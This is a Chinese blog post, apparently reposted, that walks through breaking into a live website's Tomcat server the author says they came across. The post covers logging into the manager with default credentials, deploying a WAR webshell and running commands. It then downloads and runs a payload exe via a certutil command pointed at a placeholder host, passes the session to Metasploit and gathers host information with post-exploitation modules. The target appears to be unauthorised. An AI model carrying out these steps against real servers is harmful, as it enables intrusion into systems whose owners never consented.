TomCat Getshell拿服务器权限实战

admin 2023年2月3日11:58:28评论36 views字数 1444阅读4分48秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


文章来源:UzJu的安全屋

原文地址:https://uzzju.com/?id=56


0x00 前言

无意中接触到一个网站,所以索性尝试一下,都是一些基本操作,大佬看看就可以了奥。注:由于保密问题,所有关于对方信息网址等各项信息都将保密打上马赛克,能打的都打上马赛克。


0x01 Tomcat入口

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

TomCat Getshell拿服务器权限实战

首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了

TomCat Getshell拿服务器权限实战

登录进去之后

TomCat Getshell拿服务器权限实战

可以看到有一个上传war部署项目的,那么就用IDEA 打包一个webshell大马 部署进去即可,首先需要一个自备的webshell大马

TomCat Getshell拿服务器权限实战

随便找一个,然后打开IDEA创建一个项目

TomCat Getshell拿服务器权限实战

一直Next即可,然后把webshell拷贝到scr目录

TomCat Getshell拿服务器权限实战

选择Project Structure

TomCat Getshell拿服务器权限实战

选择Artifacts,然后再选择webApplication: Archive

TomCat Getshell拿服务器权限实战

打勾include in project build然后点击+号选择module Output

TomCat Getshell拿服务器权限实战

选择项目即可

TomCat Getshell拿服务器权限实战

然后选择build

TomCat Getshell拿服务器权限实战

选择build Artifacts

TomCat Getshell拿服务器权限实战
TomCat Getshell拿服务器权限实战

完事之后呢,上传部署即可
TomCat Getshell拿服务器权限实战


点击Deploy之后就可以看到

TomCat Getshell拿服务器权限实战


多了一个xssx,那么访问那个目录即可

TomCat Getshell拿服务器权限实战

TomCat Getshell拿服务器权限实战


命令执行 ipconfig,可以看到内网192.168.0.128,看看用户呢
TomCat Getshell拿服务器权限实战

0x02 权限移交MSF

尝试使用shellcode制作payload

TomCat Getshell拿服务器权限实战

TomCat Getshell拿服务器权限实战


编译后利用webshell上传到服务器,有最快捷的方法把payload上传到服务器(记得一定要内网穿透)

第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)命令:
certutil -urlcache -split -f https://www.xxx.com/test.exe

第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)
TomCat Getshell拿服务器权限实战


使用webshell来到服务器的C:WindowsSystem32目录下,然后uploadfile
TomCat Getshell拿服务器权限实战

Jie.exe就是我们上传的payload,直接使用CMD运行

start C:WindowsSystem32jie.exe
TomCat Getshell拿服务器权限实战

内网的IP为192.168.0.128

TomCat Getshell拿服务器权限实战

0x03 信息搜集

1. 查看路由

TomCat Getshell拿服务器权限实战

2. 查看系统信息

TomCat Getshell拿服务器权限实战

3. 进入CMD命令行 然后Net User查看用户

TomCat Getshell拿服务器权限实战

4. 调用 post/windows/gather/dumplinks 来查看最近访问的文件

TomCat Getshell拿服务器权限实战

5. 调用 post/windows/gather/enum_applications 来查看目标主机安装软件的信息

TomCat Getshell拿服务器权限实战

这些都是常用的一些知识,平时一定要熟记于心的


关 注 有 礼



关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

TomCat Getshell拿服务器权限实战 还在等什么?赶紧点击下方名片关注学习吧!TomCat Getshell拿服务器权限实战


推 荐 阅 读




TomCat Getshell拿服务器权限实战
TomCat Getshell拿服务器权限实战
TomCat Getshell拿服务器权限实战

TomCat Getshell拿服务器权限实战

原文始发于微信公众号(潇湘信安):TomCat Getshell拿服务器权限实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月3日11:58:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TomCat Getshell拿服务器权限实战https://cn-sec.com/archives/1287906.html

发表评论

匿名网友 填写信息